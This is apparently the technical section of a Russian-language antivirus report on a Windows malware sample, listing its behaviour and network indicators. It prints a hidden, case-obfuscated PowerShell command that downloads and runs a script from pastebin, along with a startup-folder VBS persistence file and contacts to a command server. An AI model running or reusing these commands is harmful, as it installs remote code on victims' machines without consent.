Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\nosleep.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('https://pastebin.com/raw/STGGsHfq')
- %APPDATA%\nosleep.vbs
- 'pa###bin.com':443
- '19#.#7.97.172':1111
- http://19#.##.97.172:1111/ready via 19#.#7.97.172
- DNS ASK pa###bin.com
- DNS ASK k.###4top.io
- '<SYSTEM32>\wscript.exe' "%APPDATA%\NoSleep.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('https://pastebin.com/raw/STGGsHfq')' (со скрытым окном)